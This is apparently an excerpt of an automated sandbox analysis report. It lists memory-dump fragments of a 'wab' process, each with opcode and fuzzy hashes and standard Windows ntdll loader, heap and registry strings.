                                          • API ID:
                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                          • API String ID: 0-318774311
                                          • Opcode ID: b843075884d40419ecc3d9a812642b1cec63978b1e82b65e186666f07ad2f9f3
                                          • Instruction ID: 90416d3f73309e7b531dddaf2f2a4660e2257ca6073c663abcc27ce2b928e6ad
                                          • Opcode Fuzzy Hash: b843075884d40419ecc3d9a812642b1cec63978b1e82b65e186666f07ad2f9f3
                                          • Instruction Fuzzy Hash: 1C818DB1609340AFE311CB15C884F6ABBE8EF94754F00496DBDA09B3B0E7B4D944CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %$&$@
                                          • API String ID: 0-1537733988
                                          • Opcode ID: 84a68c0377892a9f390110e3a15cfb46d50a61818864f3702ee5f6598501b54f
                                          • Instruction ID: 4a699c1ed0aba1cb173ca438eb4ce11cac5cd0d9e876367bcbfce4cf43128c14
                                          • Opcode Fuzzy Hash: 84a68c0377892a9f390110e3a15cfb46d50a61818864f3702ee5f6598501b54f
                                          • Instruction Fuzzy Hash: 1071AC706193029FD704CF64C980B1BBBE5BF99718F118A2DE5EA87292C731D90DCB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 2479B82A
                                          • GlobalizationUserSettings, xrefs: 2479B834
                                          • TargetNtPath, xrefs: 2479B82F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                          • API String ID: 0-505981995
                                          • Opcode ID: e5d0bfd67f68551f47f0f8cd6f69de0ca3a676c7818b9654bedc5836918fdf7c
                                          • Instruction ID: 256f6e742d40135fe1f12885b92862af2acde23687e224004151b3865a6ab3ce
                                          • Opcode Fuzzy Hash: e5d0bfd67f68551f47f0f8cd6f69de0ca3a676c7818b9654bedc5836918fdf7c
                                          • Instruction Fuzzy Hash: 88616A72911228EFDB21DF54DC88BDABBF8BB14720F0101E9A518AB351DB749E84CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • HEAP[%wZ]: , xrefs: 2471E6A6
                                          • HEAP: , xrefs: 2471E6B3
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 2471E6C6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: 39d6bb4ffac4b5af60c5ae40838cfdc59ec66a9c83cc3fe9b8569cb4a8e62730
                                          • Instruction ID: 6566561f16129a4ca46701f7c1ffe0015f9222c9d50fa0b995daf76f7e08b608
                                          • Opcode Fuzzy Hash: 39d6bb4ffac4b5af60c5ae40838cfdc59ec66a9c83cc3fe9b8569cb4a8e62730
                                          • Instruction Fuzzy Hash: 8E51A031700644EFE716CBA4C994F9ABBF8EF15700F0440A5E5D6EB692D7B4EA40CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpCompleteMapModule, xrefs: 2472A590
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 2472A589
                                          • minkernel\ntdll\ldrmap.c, xrefs: 2472A59A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 679ef7111cfa5a6bfa12cd5b54a7e6c5a5da7589949da6f1e1d6d18908399de7
                                          • Instruction ID: d4e9399e3741ba54a052ddbbc2b50689d84a8943d7dfa3927c0f36e2d1ebb27e
                                          • Opcode Fuzzy Hash: 679ef7111cfa5a6bfa12cd5b54a7e6c5a5da7589949da6f1e1d6d18908399de7
                                          • Instruction Fuzzy Hash: 57512070701B85DBE716CB29C980FAA7BE4EF10714F1806A5EA65AB3E2C774ED40DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Failed to reallocate the system dirs string !, xrefs: 247382D7
                                          • minkernel\ntdll\ldrinit.c, xrefs: 247382E8
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 247382DE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1783798831
                                          • Opcode ID: 07f4fbd9b0f3e95594a1dc7d38ffa5c3c8bca0a65a38eb06dc72e3b9ffdbcf24
                                          • Instruction ID: 5b1c6033004b8739e5a78f32b9dfd398af43c736265a662e5bea97a1c2117e4a
                                          • Opcode Fuzzy Hash: 07f4fbd9b0f3e95594a1dc7d38ffa5c3c8bca0a65a38eb06dc72e3b9ffdbcf24
                                          • Instruction Fuzzy Hash: 264110B2505700ABD315DB24CC84F8B7BE8FF55B50F02092AFAA9E7391E734D8008B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                          • API String ID: 0-1151232445
                                          • Opcode ID: 418cea602b603ada023e80cdf5e0f634b3decbc5f2ffe4f52e0860a096eebfe4
                                          • Instruction ID: 4fd819b346705a7c372ad124e85c26ea10fa7b8bf13998b80ad7d4f76f9fabd7
                                          • Opcode Fuzzy Hash: 418cea602b603ada023e80cdf5e0f634b3decbc5f2ffe4f52e0860a096eebfe4
                                          • Instruction Fuzzy Hash: 0F414970300A808FEB16DF1DC0D1BA97BE49F11344F1444A9DAD9AB747E774D985CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpAllocateTls, xrefs: 24731B40
                                          • minkernel\ntdll\ldrtls.c, xrefs: 24731B4A
                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 24731B39
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-4274184382
                                          • Opcode ID: f886b7e09e15e719ab65b92f0abb8bc317c7226faf85c0ef561a47be6dfa18aa
                                          • Instruction ID: 82951e9d3537f109a24093a2607fe94c7cea43fcb99336e4575f7103b799c2e2
                                          • Opcode Fuzzy Hash: f886b7e09e15e719ab65b92f0abb8bc317c7226faf85c0ef561a47be6dfa18aa
                                          • Instruction Fuzzy Hash: B3416975A00A04AFDB16CFA9CC81AAEBBF5FF58304F158119E419A7304E774A840CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • @, xrefs: 2477C1F1
                                          • PreferredUILanguages, xrefs: 2477C212
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 2477C1C5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          • Opcode ID: b8b68fb3c494964a0e6cf5842e7d3e50c741378ed07160496cd6883f339611c9
                                          • Instruction ID: 7f601f3ae24a41880f1c076c13a3fa6f303fd23e90ee21368d8d9f5de83b6e08
                                          • Opcode Fuzzy Hash: b8b68fb3c494964a0e6cf5842e7d3e50c741378ed07160496cd6883f339611c9
                                          • Instruction Fuzzy Hash: 3A415E72A00219EFEF01DFD4C994FEEBBB8AB19704F50406AE625F7344E7749A448B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 24744888
                                          • LdrpCheckRedirection, xrefs: 2474488F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 24744899
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-3154609507
                                          • Opcode ID: ee017c8e31c3123415d9311176d2336d18ba7ece4e82a0c6daf81f058fb761bd
                                          • Instruction ID: b2c3b8574338fcfe74e16aa6d5d2270471e870df16d59bad4097c38eab4e980a
                                          • Opcode Fuzzy Hash: ee017c8e31c3123415d9311176d2336d18ba7ece4e82a0c6daf81f058fb761bd
                                          • Instruction Fuzzy Hash: 7B419D72E046509FCB12CE69C840E667BFDEB49B60F0105B9ED78A7316E730D901EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          • Opcode ID: 2f11d49f09dd03d1569fabdbc792e0c208df386c6c5494330ca9cd8ff98671cd
                                          • Instruction ID: 996c77357e48ef1fcf7b9893b2e37ee7481523bf4ad749f146ef18ff1be33a18
                                          • Opcode Fuzzy Hash: 2f11d49f09dd03d1569fabdbc792e0c208df386c6c5494330ca9cd8ff98671cd
                                          • Instruction Fuzzy Hash: 7A413472A00668CBEB22CBA6D944BACBBF4EF55340F14006ADD21FF3A5D7748941CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • GlobalFlag, xrefs: 2474B68F
                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 2474B632
                                          • @, xrefs: 2474B670
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                          • API String ID: 0-4192008846
                                          • Opcode ID: 311cb3959e410b48e4008b0cbef44b0dd9a426303acfc0a7076ffa19440323e6
                                          • Instruction ID: da0fbe8a31c408b8579d4463b1bd2f1b854e7125c8985f2d12e64da8c5dc692e
                                          • Opcode Fuzzy Hash: 311cb3959e410b48e4008b0cbef44b0dd9a426303acfc0a7076ffa19440323e6
                                          • Instruction Fuzzy Hash: 64316CB5D00219AFEB10EFA4CC84AEEBBB8EF54744F1044A9E615A7240D7749E40CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 24731A51
                                          • DLL "%wZ" has TLS information at %p, xrefs: 24731A40
                                          • LdrpInitializeTls, xrefs: 24731A47
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-931879808
                                          • Opcode ID: 96fc3bb3a3421d144732bdf6142a0598beae1a5f4761b8cd4400956d534ecd8a
                                          • Instruction ID: c36203976e0a462b759643d855d53216d8533c2a079fe7cdca599f7abe56daff
                                          • Opcode Fuzzy Hash: 96fc3bb3a3421d144732bdf6142a0598beae1a5f4761b8cd4400956d534ecd8a
                                          • Instruction Fuzzy Hash: 73310531B00205ABE7178B48CC89FEA77F9FB50398F060159F592BB280E774EE448794
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Process initialization failed with status 0x%08lx, xrefs: 247420F3
                                          • minkernel\ntdll\ldrinit.c, xrefs: 24742104
                                          • LdrpInitializationFailure, xrefs: 247420FA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          • Opcode ID: 48fb7d5e6a30d3b59282c33c67fb6785c767f5e5efbbccd738eec2b0561d0170
                                          • Instruction ID: f2d67ef37188c42ebe71ef0a59994b074d6854c63feac201f97f098bd560e513
                                          • Opcode Fuzzy Hash: 48fb7d5e6a30d3b59282c33c67fb6785c767f5e5efbbccd738eec2b0561d0170
                                          • Instruction Fuzzy Hash: F5F0FC31A402587FE714D748CC96FE93BBCEB54B94F500055FA147B385D2F0AD50CA51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 2bf4c86dd84e7b5810d21da58354359b1add5f72fdea47a854b4e51a3ee8589d
                                          • Instruction ID: 3a0023137c53edc58151e2d5a44315f73d47b6065c18aaa0bad4abb3c5fa378e
                                          • Opcode Fuzzy Hash: 2bf4c86dd84e7b5810d21da58354359b1add5f72fdea47a854b4e51a3ee8589d
                                          • Instruction Fuzzy Hash: 28615E72E006189FDB15CFA9C890BAEBBF9FB48704F504469E669EB352D731A940CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$$
                                          • API String ID: 0-233714265
                                          • Opcode ID: 24bdcaa5e0511d58dfe4afeaeb98d8fe256150215ccd2909a091b75b9e8f4896
                                          • Instruction ID: a01641b43715abbbb70ad30580e5d7a3fa81827239ec3fae1fa4d734c0f42fd1
                                          • Opcode Fuzzy Hash: 24bdcaa5e0511d58dfe4afeaeb98d8fe256150215ccd2909a091b75b9e8f4896
                                          • Instruction Fuzzy Hash: DD61BD72E00649DFEB29CFA4C584FADBBF1FF54308F004469D51A6B684CB74A941CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 246C063D
                                          • kLsE, xrefs: 246C0540
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 0-2547482624
                                          • Opcode ID: f19432a2dafb7f5ad0801736884880fec0acebbf99d346d64af215c2e9fb88fa
                                          • Instruction ID: bb22ec9802ae23b6fec8ea0e4f0d6592b4425d66e91d199e58c5cb6eba1014ce
                                          • Opcode Fuzzy Hash: f19432a2dafb7f5ad0801736884880fec0acebbf99d346d64af215c2e9fb88fa
                                          • Instruction Fuzzy Hash: 2051DF716047428FD324DFB5C548693BBE8EF95304F00883EEAAA97241E774DA45CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                          • API String ID: 0-118005554
                                          • Opcode ID: 6bae0ba9df7db0af0473aa82b62687a8eb2a8680130bed3ac94e534e0818944e
                                          • Instruction ID: bc06621eb99db8930a02b61b1476e1c9adc7cee433ec1f0af0212d1fecc94f5a
                                          • Opcode Fuzzy Hash: 6bae0ba9df7db0af0473aa82b62687a8eb2a8680130bed3ac94e534e0818944e
                                          • Instruction Fuzzy Hash: 2631C1322097419BE311CF25D484B1AB7E4EF95750F04086DFD64CB3A0EBB0D905CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 24732A95
                                          • RtlpInitializeAssemblyStorageMap, xrefs: 24732A90
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                          • API String ID: 0-2653619699
                                          • Opcode ID: 7fd2b2c3be06bd34ded01f2ee0dce5141028c30f44a05e37f2ad63e6649b2ffa
                                          • Instruction ID: e8fa157d081d118f85e5b04dc937566e7d8a051542b1a04bfec48f20dc4e2d71
                                          • Opcode Fuzzy Hash: 7fd2b2c3be06bd34ded01f2ee0dce5141028c30f44a05e37f2ad63e6649b2ffa
                                          • Instruction Fuzzy Hash: D3114C72B00314FBE7258A98CD45F5B7EADDBA4B54F1980697E04EF345D6B4CD4086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          • Opcode ID: d91806b5583a3cccb4ac33fde3e26c16e90355f17e15c2074a5723f9f4e842e5
                                          • Instruction ID: 6f2960fd0ac7be419926a1291bf130105b0d38e0c44230134e78aba9edec6792
                                          • Opcode Fuzzy Hash: d91806b5583a3cccb4ac33fde3e26c16e90355f17e15c2074a5723f9f4e842e5
                                          • Instruction Fuzzy Hash: 9601DCB2210640AFE311CF24CD59F2677E8F754B19F028939BAA8CB2A0E334D804CB46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: 0f6b851f142b313428c8dd43dd479d1d865845f1f07b0bfc14e2f098b9a4e2da
                                          • Instruction ID: 67a3d18453c768e7da56eabd45dc6f36ae876706dcdf4c836d02d4a1a4dc8c63
                                          • Opcode Fuzzy Hash: 0f6b851f142b313428c8dd43dd479d1d865845f1f07b0bfc14e2f098b9a4e2da
                                          • Instruction Fuzzy Hash: D2827C75E002588FEB25CFA9C888B9DBBB2FF58350F1081AAD959AB361D7349D41CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9490bed4cbe763661aaa5968986eba891bbd07dea590b101a129e41a12c59bb6
                                          • Instruction ID: 05beee2d9e32af8c60cf3d80e3c4da97174ebaf4b45011661ee256635a80ac1b
                                          • Opcode Fuzzy Hash: 9490bed4cbe763661aaa5968986eba891bbd07dea590b101a129e41a12c59bb6
                                          • Instruction Fuzzy Hash: 1D414D75D012889FDB15CFA9C880AEDBBF4FB58700F10816EE9AAB7211DB309945CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
